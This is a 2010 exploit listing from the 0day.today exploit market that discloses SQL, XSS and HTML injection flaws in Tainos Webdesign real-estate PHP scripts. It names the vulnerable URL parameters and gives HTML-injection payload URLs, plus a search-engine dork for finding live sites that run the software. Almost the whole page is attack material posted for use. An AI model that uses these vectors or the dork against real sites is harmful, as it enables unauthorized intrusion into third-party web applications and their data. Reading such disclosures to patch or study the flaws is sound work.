[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability

Author
CoBRa_21
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12267
Category
web applications
Date add
17-05-2010
Platform
php
===================================================================
Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
===================================================================


Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://www.tainos-webdesign.com
 
Dork: intext:"© Tainos Webdesign"
 
-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)
 
-------------------------------------------------------------------------------------------
 
XSS Injection:
 
http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------
 
HTML Injection:
 
http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------



#  0day.today [2024-12-24]  #